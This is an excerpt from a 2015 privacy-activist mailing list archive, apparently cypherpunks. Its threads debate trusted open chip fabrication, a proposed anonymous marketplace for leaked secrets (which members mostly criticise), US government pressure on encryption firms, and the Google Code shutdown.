could print trusted opensource hardware... an open fab. Otherwise you're effectively saying "Fuck it". From grarpamp at gmail.com Thu Jul 30 17:24:11 2015 From: grarpamp at gmail.com (grarpamp) Date: Thu, 30 Jul 2015 20:24:11 -0400 Subject: Open Fabs In-Reply-To: References: <55B94E52.2050709@pilobilus.net> <55B98229.6090109@pilobilus.net> <55B9A3DA.3040701@pilobilus.net> <55B9DEC9.1070500@riseup.net> Message-ID: On Thu, Jul 30, 2015 at 7:25 PM, Zenaan Harkness wrote: > > Ahh yes! Federal politician, State politician, Local politician, > police occifer, detective, CIA agent, FBI agent, NSA agent, KGB agent, > Richard Stallman, Juan. > > That should do it? Agency is a maddening asymptote of turtles... single, double, triple, quad... Eventually it reaches near Juan's domain who will always tell you straight. So yeah, that should do just fine ;-) From grarpamp at gmail.com Thu Jul 30 17:30:21 2015 From: grarpamp at gmail.com (grarpamp) Date: Thu, 30 Jul 2015 20:30:21 -0400 Subject: Kim Dotcom on Politics, TPP, Law, Crypto, Copyright, Endgame, Perseverance Message-ID: Kim Dotcom was the founder of Megaupload, its successor Mega, and New Zealand's Internet Party. A while ago you had a chance to ask him about those things as well as the U.S. government charging him with criminal copyright violation and racketeering. Below you'll find his answers to your questions... http://yro.slashdot.org/story/15/07/27/200204/interviews-kim-dotcom-answers-your-questions From skquinn at rushpost.com Thu Jul 30 18:52:41 2015 From: skquinn at rushpost.com (Shawn K. Quinn) Date: Thu, 30 Jul 2015 20:52:41 -0500 Subject: slur: you're going to hate it In-Reply-To: <20150731011530.GA5234@android> References: <20150731011530.GA5234@android> Message-ID: <1438307561.31563.1.camel@moonpatrol> On Thu, 2015-07-30 at 21:15 -0400, Nick Econopouly wrote: > Paste for those who don't want to load the webpage: > > > http://slur.io/ > Slur: You're going to hate it. > > "Slur is an open source, decentralized and anonymous marketplace for the > selling of secret information in exchange for bitcoin. Slur is written > in C and operates over the Tor network with bitcoin transactions through > libbitcoin. Both buyers and sellers are fully anonymous and there are no > restrictions on the data that is auctioned. There is no charge to buy or > sell on the Slur marketplace except in the case of a dispute, where a > token sum is paid to volunteers. - See more at: > http://slur.io/#sthash.OsHtOC5o.dpuf" [...] This is either going to be very good or very bad. Only time will tell which way this goes. -- Shawn K. Quinn From nickeconopouly at gmail.com Thu Jul 30 18:15:30 2015 From: nickeconopouly at gmail.com (Nick Econopouly) Date: Thu, 30 Jul 2015 21:15:30 -0400 Subject: slur: you're going to hate it Message-ID: <20150731011530.GA5234@android> Paste for those who don't want to load the webpage: http://slur.io/ Slur: You're going to hate it. "Slur is an open source, decentralized and anonymous marketplace for the selling of secret information in exchange for bitcoin. Slur is written in C and operates over the Tor network with bitcoin transactions through libbitcoin. Both buyers and sellers are fully anonymous and there are no restrictions on the data that is auctioned. There is no charge to buy or sell on the Slur marketplace except in the case of a dispute, where a token sum is paid to volunteers. - See more at: http://slur.io/#sthash.OsHtOC5o.dpuf" "How does it work ? Sellers encrypt, upload and then list their data on the digital market with the ease a user might list an item on eBay. They do so with full anonymity and there are no restrictions on the content of the data. Exclusive bidders attempt to purchase the data for their own use and / or prevent other parties from acquiring a copy. Should an exclusive bidder win the auction they alone will receive the decryption keys. The same data cannot be auctioned a second time on the Slur marketplace. Crowd bidders pool their funds into a single bid. Should they win the auction the network will release the decryption keys to all users on the Slur marketplace and the information will therefore become public. Arbitrators are randomly selected users who agree to weigh in on a dispute should the winner of an auction claim that the decrypted contents do not match the sellers description. Public key cryptography ensures the data being sold can only be decrypted by the winner of the auction. - See more at: http://slur.io/#sthash.OsHtOC5o.dpuf" "Implications: If correctly implemented this platform will have a profound and lasting effect on our society. An unregulated free market for information would redefine the net worth of every person as their material assets would in the future be weighed against the market value of their secrets. As damaging as Slur can be to individuals it is considerably more so for groups It's estimated that 5% of the general population are psychopaths. Introducing financial incentive in an anonymous framework will produce a greater yield of leaked information than from say the ideology that drove patriots like Edward Snowden. For every idealist willing to selflessly sacrifice their freedom, assets and even risk their lives for a greater good, there are 1000 psychopaths willing to anonymously sell out their peers for material gain. Organizations of every type; governments, corporations and the military are in the unfortunate predicament of having both a great deal of liquid assets and a large number of secrets to protect - accessible by numerous disgruntled or psychopathic personnel. When Slur becomes ubiquitous it will bleed organizations secrets and funds. The Slur marketplace will sharply increase demand for bitcoin from those parties attempting to purchase previously inaccessible secret information and organizations scrambling to suppress damaging leaks from inside their own ranks or security breaches. The Slur market is WikiLeaks 2.0. An incalculable resource for public knowledge and unfiltered access to the truth. Except that in the future journalists will need to compensate whistle blowers for the extreme risks they take. The types of information we expect to see on the Slur marketplace ; Trade secrets. Designs for every type of consumer product. The source code for proprietary operating systems and high end CAD software. Zero day exploits. For the market defined value rather than a price determined by the corporations under the guise of a bounty with the veiled threat of legal action should the researcher choose to sell elsewhere. The details of backdoors covertly installed inside industrial and consumer hardware and software. Stolen databases. Corporations will no longer be able to get away with an apology when they fail to secure their customers confidential data. They will have to pay the market value to suppress it. Proof of tax evasion from disgruntled or underpaid employees. Both the IRS and the public have an interest in that information and the corporations will have to bid to suppress it - a very quantifiable and predictable payoff for the seller. Military intelligence relevant to real-time conflicts. Aerospace and defense designs. Evidence relevant to ongoing trials. Unflattering celebrity photos and videos. The complete databases of social media sites like facebook. Proof of government corruption. Close to an election. - See more at: http://slur.io/#sthash.OsHtOC5o.dpuf" The site appeals for donations and has a crossed out sentence saying production versions will be available in july 2015. Thoughts? -nick From zen at freedbms.net Thu Jul 30 16:25:34 2015 From: zen at freedbms.net (Zenaan Harkness) Date: Thu, 30 Jul 2015 23:25:34 +0000 Subject: Open Fabs In-Reply-To: References: <55B94E52.2050709@pilobilus.net> <55B98229.6090109@pilobilus.net> <55B9A3DA.3040701@pilobilus.net> <55B9DEC9.1070500@riseup.net> Message-ID: On 7/30/15, grarpamp wrote: > On Thu, Jul 30, 2015 at 4:22 AM, Mirimir wrote: >> Also, how many people? And how to trust them? One bad apple, you know. > > Again... draw interested people from multiple philosophical sectors, use > multiple man rule, consensus rule. Ahh yes! Federal politician, State politician, Local politician, police occifer, detective, CIA agent, FBI agent, NSA agent, KGB agent, Richard Stallman, Juan. That should do it? From oshwm at openmailbox.org Thu Jul 30 15:34:56 2015 From: oshwm at openmailbox.org (oshwm) Date: Thu, 30 Jul 2015 23:34:56 +0100 Subject: Open Fabs In-Reply-To: <55BAA120.2050901@virtadpt.net> References: <55B94E52.2050709@pilobilus.net> <55B98229.6090109@pilobilus.net> <55B9A3DA.3040701@pilobilus.net> <55B9DEC9.1070500@riseup.net> <5E9B787D-4964-4B67-8934-67D28BE9DDC6@openmailbox.org> <55BA5920.5000903@virtadpt.net> <55BAA120.2050901@virtadpt.net> Message-ID: <55BAA690.1070801@openmailbox.org> On 30/07/15 23:11, The Doctor wrote: > On 07/30/2015 11:42 AM, grarpamp wrote: > > > because you can exhaustively test their logic. On the other hand, > > how do you know that once you connect enough of them to each other > > that their secret gates inside don't sense each other and activate? > > Since you're that close to stone age anyway, why not start one more > > step back at relays and core memory. > > So what you're basically saying is that the entire tech stack, all the > way back to far edge pf electromechanical information processing is > basically completely untrustworthy. There is no way at all to trust > anything that we can't actually see the logic gates of with the naked > eye, which would put us... where? Maybe tens of computations per > second, at most? A little more (but not much)? > > Fuck it. Time to go home, everyone. They Won. > That is spot on, we can't trust any of it and most people would concede that we have lost the battle. So (in my fairly inexperienced opinion in this field) there are possibly two options:- 1) Re-invent the last 65 years of Computing - not impossible and we have the knowledge amongst most average tinkerer to do this but maybe it'll take us 10-20 years to catch up, utilising (potentially massively) parallel processing from early on in the process to gain speeds that were not common in the past at certain tech levels. 2) Look at if it is possible for us to develop trustworthy systems using untrustworthy components. Is there a way we can maybe use multiple components to compare their outputs to see if any of them are not trustworthy? Or maybe identify untrustworthy results from operations and ignore them, favouring trustworthy results? -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 819 bytes Desc: OpenPGP digital signature URL: From zen at freedbms.net Thu Jul 30 16:43:05 2015 From: zen at freedbms.net (Zenaan Harkness) Date: Thu, 30 Jul 2015 23:43:05 +0000 Subject: Open Fabs In-Reply-To: <55BAA690.1070801@openmailbox.org> References: <55B94E52.2050709@pilobilus.net> <55B98229.6090109@pilobilus.net> <55B9A3DA.3040701@pilobilus.net> <55B9DEC9.1070500@riseup.net> <5E9B787D-4964-4B67-8934-67D28BE9DDC6@openmailbox.org> <55BA5920.5000903@virtadpt.net> <55BAA120.2050901@virtadpt.net> <55BAA690.1070801@openmailbox.org> Message-ID: On 7/30/15, oshwm wrote: > On 30/07/15 23:11, The Doctor wrote: >> On 07/30/2015 11:42 AM, grarpamp wrote: >> > because you can exhaustively test their logic. On the other hand, >> > how do you know that once you connect enough of them to each other >> > that their secret gates inside don't sense each other and activate? >> > Since you're that close to stone age anyway, why not start one more >> > step back at relays and core memory. >> >> So what you're basically saying is that the entire tech stack, all the >> way back to far edge pf electromechanical information processing is >> basically completely untrustworthy. There is no way at all to trust >> anything that we can't actually see the logic gates of with the naked >> eye, which would put us... where? Maybe tens of computations per >> second, at most? A little more (but not much)? >> >> Fuck it. Time to go home, everyone. They Won. >> > > That is spot on, we can't trust any of it and most people would concede > that we have lost the battle. I don't buy that. 0) Whilst using modern Intel vaseline chips: 1) Program full FLOSS stack for circuit/chip dev: # some starts: apt-cache search circuit apt-cache search electron 2) Start with one of the FLOSS CPUs, eg SPARC2, and divide and conquer it's analysis audit. 3) With open audited/auditable fab, we burn some chips. 4) Now divide and conquer to analyse those physical chips, using physical analysis one step below the process node - eg 120nm chip, 60nm chip analysis. As these steps occur, software is developed to facilitate each step of course. Proprietary software for the audit bits though to make sure it is not backdoored by Intel. From zen at freedbms.net Thu Jul 30 23:23:58 2015 From: zen at freedbms.net (Zenaan Harkness) Date: Fri, 31 Jul 2015 06:23:58 +0000 Subject: slur: you're going to hate it In-Reply-To: <20150731011530.GA5234@android> References: <20150731011530.GA5234@android> Message-ID: I have serious problems with this - leak by economic purchasing power? Where's the principle in that? What could possibly go wrong? This allows the mega wealthy to pay for the protection of their data. If such a market actually gets going, if nothing else it's a turbo charged economic greasing of economic information blackmail. Please people, think before you support such a things. Obviously the oligarchies around the planet will love such a thing (they print the money anyway, so a few dollars is pocket change - a pittance to them anyway). I guess we had to see such reactions to Snowden and his ilk. Juan, your voice is needed so much more now than ever! Where this goes will be interesting to say the least. On 7/31/15, Nick Econopouly wrote: > Paste for those who don't want to load the webpage: > > > http://slur.io/ > Slur: You're going to hate it. > > "Slur is an open source, decentralized and anonymous marketplace for the > selling of secret information in exchange for bitcoin. Slur is written > in C and operates over the Tor network with bitcoin transactions through > libbitcoin. Both buyers and sellers are fully anonymous and there are no > restrictions on the data that is auctioned. There is no charge to buy or > sell on the Slur marketplace except in the case of a dispute, where a > token sum is paid to volunteers. - See more at: > http://slur.io/#sthash.OsHtOC5o.dpuf" > > "How does it work ? > > > Sellers encrypt, upload and then list their data on the digital > market with the ease a user might list an item on eBay. They do so > with full anonymity and there are no restrictions on the content of > the data. > > Exclusive bidders attempt to purchase the data for their own use > and / or prevent other parties from acquiring a copy. Should an > exclusive bidder win the auction they alone will receive the > decryption keys. The same data cannot be auctioned a second time > on the Slur marketplace. > > Crowd bidders pool their funds into a single bid. Should they > win the auction the network will release the decryption keys > to all users on the Slur marketplace and the information will > therefore become public. > > Arbitrators are randomly selected users who agree to weigh > in on a dispute should the winner of an auction claim that > the decrypted contents do not match the sellers > description. > > Public key cryptography ensures the data being sold can > only be decrypted by the winner of the auction. > - See more at: http://slur.io/#sthash.OsHtOC5o.dpuf" > > > "Implications: > If correctly implemented this platform will have a profound and lasting > effect on our society. > > An unregulated free market for information would redefine the net worth > of every person as their material assets would in the future be weighed > against the market value of their secrets. > > As damaging as Slur can be to individuals it is considerably more so for > groups > > It's estimated that 5% of the general population are psychopaths. > Introducing financial incentive in an anonymous framework will produce a > greater yield of leaked information than from say the ideology that > drove patriots like Edward Snowden. For every idealist willing to > selflessly sacrifice their freedom, assets and even risk their lives for > a greater good, there are 1000 psychopaths willing to anonymously sell > out their peers for material gain. > > Organizations of every type; governments, corporations and the military > are in the unfortunate predicament of having both a great deal of liquid > assets and a large number of secrets to protect - accessible by numerous > disgruntled or psychopathic personnel. When Slur becomes ubiquitous it > will bleed organizations secrets and funds. > > The Slur marketplace will sharply increase demand for bitcoin from those > parties attempting to purchase previously inaccessible secret > information and organizations scrambling to suppress damaging leaks from > inside their own ranks or security breaches. > > The Slur market is WikiLeaks 2.0. An incalculable resource for public > knowledge and unfiltered access to the truth. Except that in the future > journalists will need to compensate whistle blowers for the extreme > risks they take. > > The types of information we expect to see on the Slur marketplace ; > > Trade secrets. > > Designs for every type of consumer product. > > The source code for proprietary operating systems and high end > CAD software. > > Zero day exploits. For the market defined value rather than > a price determined by the corporations under the guise of a > bounty with the veiled threat of legal action should the > researcher choose to sell elsewhere. > > The details of backdoors covertly installed inside > industrial and consumer hardware and software. > > Stolen databases. Corporations will no longer be able > to get away with an apology when they fail to secure > their customers confidential data. They will have to > pay the market value to suppress it. > > Proof of tax evasion from disgruntled or underpaid > employees. Both the IRS and the public have an > interest in that information and the corporations > will have to bid to suppress it - a very > quantifiable and predictable payoff for the seller. > > Military intelligence relevant to real-time > conflicts. > > Aerospace and defense designs. > > Evidence relevant to ongoing trials. > > Unflattering celebrity photos and > videos. > > The complete databases of social > media sites like facebook. > > Proof of government corruption. > Close to an election. - See more > at: > http://slur.io/#sthash.OsHtOC5o.dpuf" > > > The site appeals for donations and has a crossed out sentence saying > production versions will be available in july 2015. > > Thoughts? > > -nick > From Rayzer at riseup.net Fri Jul 31 09:48:48 2015 From: Rayzer at riseup.net (Razer) Date: Fri, 31 Jul 2015 09:48:48 -0700 Subject: slur: you're going to hate it In-Reply-To: References: <20150731011530.GA5234@android> Message-ID: <55BBA6F0.3020209@riseup.net> On 07/30/2015 11:23 PM, Zenaan Harkness wrote: > I have serious problems with this - leak by economic purchasing power? > Where's the principle in that? What could possibly go wrong? > > This allows the mega wealthy to pay for the protection of their data. > If such a market actually gets going, if nothing else it's a turbo > charged economic greasing of economic information blackmail. > > Please people, think before you support such a things. > > Obviously the oligarchies around the planet will love such a thing > (they print the money anyway, so a few dollars is pocket change - a > pittance to them anyway). > > I guess we had to see such reactions to Snowden and his ilk. > > Juan, your voice is needed so much more now than ever! > > Where this goes will be interesting to say the least. > > The 'donate' hash said something about 'counterbalancing the class war' and I immediately thought, 'in whose favor?'. But I'm one who doesn't believe mythical currencies like cash and bitcoins EVER 'stops pigs' or 'serves people'. RR "It's not the world it's the people." ~War, The World Is A Ghetto -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 819 bytes Desc: OpenPGP digital signature URL: From drwho at virtadpt.net Fri Jul 31 10:51:13 2015 From: drwho at virtadpt.net (The Doctor) Date: Fri, 31 Jul 2015 10:51:13 -0700 Subject: Open Fabs In-Reply-To: References: <55B94E52.2050709@pilobilus.net> <55B98229.6090109@pilobilus.net> <55B9A3DA.3040701@pilobilus.net> <55B9DEC9.1070500@riseup.net> <5E9B787D-4964-4B67-8934-67D28BE9DDC6@openmailbox.org> <55BA5920.5000903@virtadpt.net> <55BAA120.2050901@virtadpt.net> <55BAA690.1070801@openmailbox.org> Message-ID: <55BBB591.6060005@virtadpt.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 On 07/30/2015 04:43 PM, Zenaan Harkness wrote: > 1) Program full FLOSS stack for circuit/chip dev: # some starts: > apt-cache search circuit apt-cache search electron > > 2) Start with one of the FLOSS CPUs, eg SPARC2, and divide and > conquer it's analysis audit. That's been mentioned here serveral times. Then someone else chimes in with the injection of boobytrapped packages to ensure that designs are automagickally tampered with or boobytrapped compilers (nevermind that we have a workable way of detecting and mitigating the attack (try it, it works!)). Then someone else chimes in with "Well, we can't even trust the FPGAs or the gate synthesis software for the same reason." This is yet another iteration of the same loop on this mailing list. It would be killfile-able if some of the basic terms didn't change between iterations. I suppose what I'm bitching about (and I've probably just faceplanted by stepping into that particular pothole - it's my turn, I guess) is that there seems to be no part of the threat model where risk is acceptible. I mean, going all the way back to hand-wired electromechanical processors just to be able to bootstrap back to silicon and losing 20-30 years of technical advancement? Somewhere, we went way off course. There is a saying: "Perfect is the enemy of working." I think that's where we as a group have lost our way. The threats are known. The risks are known. Let's act. - -- The Doctor [412/724/301/703/415] [ZS] PGP: 0x807B17C1 / 7960 1CDC 85C9 0B63 8D9F DD89 3BD8 FF2B 807B 17C1 WWW: https://drwho.virtadpt.net/ "Holy crap! What have I gotten myself into!?" --Adam Savage -----BEGIN PGP SIGNATURE----- iQIcBAEBCgAGBQJVu7WMAAoJED1np1pUQ8RkJN4QAIbZgO+Hjz6/hYqlRjS7vUu6 tv2/9S0/ZXQ6EyzUWwkToWfN/KCIQg+UdlcsxnQMe+jLYfDYB4greeSdUnXhUOMN lec0rnxDJ2taHUgd0OVnsJ90uHXs7NGkI1QM5vlNXwFjvSpcCz212rKdljymBsJx bIsfzF2YioqAaSXREBe/OZvFahRfiKa693FmeU3WLVuU6k5CUk7fpEGUEhiZllmU JmE7jAPovTtZ9kSoNA9WX9WX2TEdBocOh0JmekX8vak1tXURzZKktomaEbnMaaOz +lPlbpRdzUL4KKBMoXWNwcZDCjizYO3HGJkeOyglgxzG0KiEW13EVwTwpON04rFw Cmsywhh3/eeRCjVQhuGuGbOUHe7UZRqPunKB8kC1glNMAMueICiDQVlYQIBNZZ7s Mjax7NhElVBfRWrVWW0ZgQTlxRxLVtoq4/vmtQaleofynxn3CBo1f2+faZO+sI7Q U10ZW7jku1mHmCeo4EZgj8CkE336F7uJ/J8ZvhzXsrSsA6aD5vcC5JOYkYk5NiNN R1ULwRH1Dt3g910jG/2KjD8x9yl9ZMplYftrNH9IWWoXEnLI2XkHZWCK2Hg+exqS /J/F6NhEY53x+ZqGAI9CJ4vYAVFFY8MuLSnbmmM1hCBQmT776Yoiv7lKDEuKJJsU Av0wsd46vJLmXF0/RY7P =O/ho -----END PGP SIGNATURE----- From nickeconopouly at gmail.com Fri Jul 31 11:23:01 2015 From: nickeconopouly at gmail.com (Nick Econopouly) Date: Fri, 31 Jul 2015 14:23:01 -0400 Subject: [nickeconopouly@gmail.com: Re: slur: you're going to hate it] Message-ID: <20150731182300.GD5278@android> ----- Forwarded message from Nick Econopouly ----- > Date: Fri, 31 Jul 2015 14:21:44 -0400 > From: Nick Econopouly > To: Zenaan Harkness > Subject: Re: slur: you're going to hate it > User-Agent: Mutt/1.5.23+89 (0255b37be491) (2014-03-12) > > On 07/31, Zenaan Harkness wrote: > > I have serious problems with this - leak by economic purchasing power? > > Where's the principle in that? What could possibly go wrong? > exactly. More like what could go right > > > > This allows the mega wealthy to pay for the protection of their data. > > If such a market actually gets going, if nothing else it's a turbo > > charged economic greasing of economic information blackmail. > Well, this assumes that the leakers don't royally rip off the wealthy > before releasing the data anyway. > > > > Please people, think before you support such a things. > > > > Obviously the oligarchies around the planet will love such a thing > > (they print the money anyway, so a few dollars is pocket change - a > > pittance to them anyway). > > I would be really surprised if Slur followed through and the oligarchies > loved it. What if people release info for free? or accept donations? > Sure, it's based on the pseudo-science of economics, it's home turf, > but somehow I doubt that the USA would take a liking to a new leaking platform. > > What would be interesting to see is governments(perhaps anonymously) > spending huge amounts to shame each other > > regards, > nick ----- End forwarded message ----- From nickeconopouly at gmail.com Fri Jul 31 11:23:29 2015 From: nickeconopouly at gmail.com (Nick Econopouly) Date: Fri, 31 Jul 2015 14:23:29 -0400 Subject: [nickeconopouly@gmail.com: Re: slur: you're going to hate it] Message-ID: <20150731182329.GE5278@android> ----- Forwarded message from Nick Econopouly ----- > Date: Fri, 31 Jul 2015 14:04:51 -0400 > From: Nick Econopouly > To: Razer > Subject: Re: slur: you're going to hate it > User-Agent: Mutt/1.5.23+89 (0255b37be491) (2014-03-12) > > On 07/31, Razer wrote: > > > > > > On 07/30/2015 11:23 PM, Zenaan Harkness wrote: > > > I have serious problems with this - leak by economic purchasing power? > > > Where's the principle in that? What could possibly go wrong? > > > > > > This allows the mega wealthy to pay for the protection of their data. > > > If such a market actually gets going, if nothing else it's a turbo > > > charged economic greasing of economic information blackmail. > > > > > > Please people, think before you support such a things. > > > > > > Obviously the oligarchies around the planet will love such a thing > > > (they print the money anyway, so a few dollars is pocket change - a > > > pittance to them anyway). > > > > > > I guess we had to see such reactions to Snowden and his ilk. > > > > > > Juan, your voice is needed so much more now than ever! > > > > > > Where this goes will be interesting to say the least. > > > > > > > > > > The 'donate' hash said something about 'counterbalancing the class war' > > and I immediately thought, 'in whose favor?'. But I'm one who doesn't > > believe mythical currencies like cash and bitcoins EVER 'stops pigs' or > > 'serves people'. > Weird, right? > "Using the enemy's tool against him" works much better when the enemy > isn't the #1 owner, printer, miner of the tool > > Although I have to admit, copyleft is an example of that concept applied > correctly. > > -nick ----- End forwarded message ----- From nickeconopouly at gmail.com Fri Jul 31 11:23:36 2015 From: nickeconopouly at gmail.com (Nick Econopouly) Date: Fri, 31 Jul 2015 14:23:36 -0400 Subject: [nickeconopouly@gmail.com: Re: slur: you're going to hate it] Message-ID: <20150731182336.GF5278@android> ----- Forwarded message from Nick Econopouly ----- > Date: Fri, 31 Jul 2015 13:55:25 -0400 > From: Nick Econopouly > To: "Shawn K. Quinn" > Subject: Re: slur: you're going to hate it > User-Agent: Mutt/1.5.23+89 (0255b37be491) (2014-03-12) > > On 07/30, Shawn K. Quinn wrote: > > On Thu, 2015-07-30 at 21:15 -0400, Nick Econopouly wrote: > > > Paste for those who don't want to load the webpage: > > > > > > > > > http://slur.io/ > > > Slur: You're going to hate it. > > > > > > "Slur is an open source, decentralized and anonymous marketplace for the > > > selling of secret information in exchange for bitcoin. Slur is written > > > in C and operates over the Tor network with bitcoin transactions through > > > libbitcoin. Both buyers and sellers are fully anonymous and there are no > > > restrictions on the data that is auctioned. There is no charge to buy or > > > sell on the Slur marketplace except in the case of a dispute, where a > > > token sum is paid to volunteers. - See more at: > > > http://slur.io/#sthash.OsHtOC5o.dpuf" > > [...] > > > > This is either going to be very good or very bad. Only time will tell > > which way this goes. > I tend to agree. It has potential to incentize the release of more > information, or create incentive to hoard information and release it > based on the market instead of what is right or wrong. > > In general though I think the project won't be moving forward, for > several reasons > > The service offered by "slur" could easily exist on many DNMs right now > anyway-- I know there are sites where you can buy credit cards, etc. > Does agora sell digital goods? > > The website makes some fantastic claims as well. For instance the claim > that information can not be sold twice on the slur marketplace, or that > someone could really "prevent other parties from acquiring a copy" by > buying it themselves-- Slur is making the mistake of treating IP like > actual tangible property that can't be copied. > > Also, the functionality of Slur would rely on Arbitrators judging > disputes fairly instead of in some other interest > > But there really should be a better leaking platform than just sending > it to an institution (guardian,wikileaks) or hosting it somewhere on the > darknet and hoping people find it > > -nick > ----- End forwarded message ----- From grarpamp at gmail.com Fri Jul 31 14:05:16 2015 From: grarpamp at gmail.com (grarpamp) Date: Fri, 31 Jul 2015 17:05:16 -0400 Subject: Open Fabs In-Reply-To: <145357920.6673577.1438372406644.JavaMail.yahoo@mail.yahoo.com> References: <55BBB591.6060005@virtadpt.net> <145357920.6673577.1438372406644.JavaMail.yahoo@mail.yahoo.com> Message-ID: On Fri, Jul 31, 2015 at 3:53 PM, jim bell wrote: > From: The Doctor > >>I suppose what I'm bitching about (and I've probably just faceplanted >>by stepping into that particular pothole - it's my turn, I guess) is that >>there seems to be no part of the threat model where risk is >>acceptible. I mean, going all the way back to hand-wired >>electromechanical processors just to be able to bootstrap back to >>silicon and losing 20-30 years of technical advancement? It's a fast rebuild using trusted principles, there are no tech discoveries needed, no loss of any tech. Yes you have to learn to apply trusted principles, that will take time. And keep up with whatever new tech comes after the time you start, which is normal. So for a while you just have to work harder, faster, better. That's standard practice and nothing new for a startup and people in them. >>Somewhere, we went way off course. There is a saying: "Perfect is the >>enemy of working." I think that's where we as a group have lost our way. > >>The threats are known. The risks are known. Let's act. > > I agree with that. I think it's better that we get 50% of the population to > use encrypted phones, where the encryption isn't truly known to be perfect, > than to get 1% of the population to use perfect encryption. Verifying the > last little bit of doubt is going to cost a rather large amount of money. > Raising the demand for crypto phones to 50% represents a huge market, which > will be satisfied, and the profits for that market will pay for the next > generation of closer-to-perfect phones. Ok fine, let's say you don't care to trust your chip designing and printing hardware, and you opt to totally skip doing anything to rebuild or validate those parts of the trust chain [1]. But you still do want an open hardware crypto phone for yourself and the masses, which would you prefer to do: a) wait for some bigcorp like MS/Nokia Apple HTC to convincingly say and show an open hardware crypto design? b) send your own open hardware design to global foundries? c) send your own open hardware design to a comunity owned and operated open fab (still being subject to your choice in [1] above)? I suggest investing in (c) now will bring more and more community and other runs through it such that you can invest in [1] above later. You might even have to bank profit from (b) to get to (c). But anything involving (a) is not "Lets's act", unless you think your pleading and pressure (which is all you can do there) will be fruitful [2]. So at minimum you best start acting on (b) or (c). Right? [2] Still waiting on open video cards and drivers eh, how many decades of "raising the demand" has that been? Lol. Oh, but Apple did add some closed crypto'ey fingerprint'ey passphrase'ey thing to their phone, so maybe that was pressure, and trust'ey enough, and we can all "act" by throwing dollars at that instead of ever having our own (b/c/[1]), and just have faith instead. I'm tired of (a), and it's boring, and if not evil at least not really aligned to your interests. If you want something done, carry a big stick, or do it yourself until you have one. From grarpamp at gmail.com Fri Jul 31 14:45:11 2015 From: grarpamp at gmail.com (grarpamp) Date: Fri, 31 Jul 2015 17:45:11 -0400 Subject: Delete and migrate your junk off GoogleCode by August 25 !!! Message-ID: It's going away, so if you've got stuff there you want to delete and manage without interacting with their humans and policy/archive wonks, do it now!!! http://google-opensource.blogspot.com/2015/03/farewell-to-google-code.html https://code.google.com/p/support/wiki/ReadOnlyTransition Sourceforge has been acting weird too, but you knew that. From grarpamp at gmail.com Fri Jul 31 16:52:52 2015 From: grarpamp at gmail.com (grarpamp) Date: Fri, 31 Jul 2015 19:52:52 -0400 Subject: Obama heads level "material support" at crypto purveyors Message-ID: https://firstlook.org/theintercept/2015/07/30/obama-administration-war-apple-google-just-got-uglier/ The Obama administration’s central strategy against strong encryption seems to be waging war on the companies that are providing and popularizing it: most notably Apple and Google. The intimidation campaign got a boost Thursday when a blog that frequently promotes the interests of the national security establishment raised the prospect of Apple being found liable for providing material support to a terrorist. From jdb10987 at yahoo.com Fri Jul 31 12:53:26 2015 From: jdb10987 at yahoo.com (jim bell) Date: Fri, 31 Jul 2015 19:53:26 +0000 (UTC) Subject: Open Fabs In-Reply-To: <55BBB591.6060005@virtadpt.net> References: <55BBB591.6060005@virtadpt.net> Message-ID: <145357920.6673577.1438372406644.JavaMail.yahoo@mail.yahoo.com> From: The Doctor >I suppose what I'm bitching about (and I've probably just faceplanted >by stepping into that particular pothole - it's my turn, I guess) is that >there seems to be no part of the threat model where risk is >acceptible.  I mean, going all the way back to hand-wired >electromechanical processors just to be able to bootstrap back to >silicon and losing 20-30 years of technical advancement? >Somewhere, we went way off course.  There is a saying: "Perfect is the >enemy of working."  I think that's where we as a group have lost our way. >The threats are known.  The risks are known.  Let's act. I agree with that.  I think it's better that we get 50% of the population to use encrypted phones, where the encryption isn't truly known to be perfect, than to get 1% of the population to use perfect encryption.  Verifying the last little bit of doubt is going to cost a rather large amount of money.  Raising the demand for crypto phones to 50% represents a huge market, which will be satisfied, and the profits for that market will pay for the next generation of closer-to-perfect phones.              Jim Bell -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 2626 bytes Desc: not available URL: From coderman at gmail.com Fri Jul 31 20:18:49 2015 From: coderman at gmail.com (coderman) Date: Fri, 31 Jul 2015 20:18:49 -0700 Subject: FOIA/PA Message-ID: hey Jim, you know what'd be fun? a FOIA/PA request to FBI for your documents. :) if you're so inclined, see https://www.muckrock.com/foi/united-states-of-america-10/privacyactdirect-19921/ for example wording of interest. best regards, codermange From zen at freedbms.net Fri Jul 31 17:44:45 2015 From: zen at freedbms.net (Zenaan Harkness) Date: Sat, 1 Aug 2015 00:44:45 +0000 Subject: Obama heads level "material support" at crypto purveyors In-Reply-To: References: Message-ID: On 7/31/15, grarpamp wrote: > https://firstlook.org/theintercept/2015/07/30/obama-administration-war-apple-google-just-got-uglier/ > > The Obama administration’s central strategy against strong encryption > seems to be waging war on the companies that are providing and > popularizing it: most notably Apple and Google. > The intimidation campaign got a boost Thursday when a blog that > frequently promotes the interests of the national security > establishment raised the prospect of Apple being found liable for > providing material support to a terrorist. Guess they should stop selling to USAGov then. Can't be seen to be supportin derowrists. From carimachet at gmail.com Fri Jul 31 15:56:12 2015 From: carimachet at gmail.com (Cari Machet) Date: Sat, 1 Aug 2015 01:56:12 +0300 Subject: Open Fabs In-Reply-To: <55B94E52.2050709@pilobilus.net> References: <55B94E52.2050709@pilobilus.net> Message-ID: On Thu, Jul 30, 2015 at 1:06 AM, Steve Kinney wrote: > -----BEGIN PGP SIGNED MESSAGE----- > > I do see problems with scaling DYI chip projects up to commercial > production numbers, and down in scale to achieve fast, high > capacity performance. That's why I am much more interested in the > prospects of a manufacturing process built for radical > transparency, using "commercial best practice" technology at > conventional production facilities. > > IMO the same kind of radical transparency should apply to all > industrial processes that pose large potential hazards to public > health & safety, i.e. nuclear power stations, transgenic > agriculture, etc. > > :o) > > i have been thinking about this and i was thinking a lot about actual nuclear bomb sites being added to the list of 'hazard to public' and i was like - not possible to give the public any kind of access to such horrors but then its already in play ... NATOish people sold the design of the bomb to pakistan and israel long ago so maybe actually if more people were involved in the process it would be in safer hands and there would be less proliferation as it seems to be the modus operandi that there be more bombs to counter best film ever points in the direction of nano/bio tech possibilities le jette with the murder of species... can we have the components make themselves and self destruct when in danger? -- Cari Machet NYC 646-436-7795 carimachet at gmail.com AIM carismachet Syria +963-099 277 3243 Amman +962 077 636 9407 Berlin +49 152 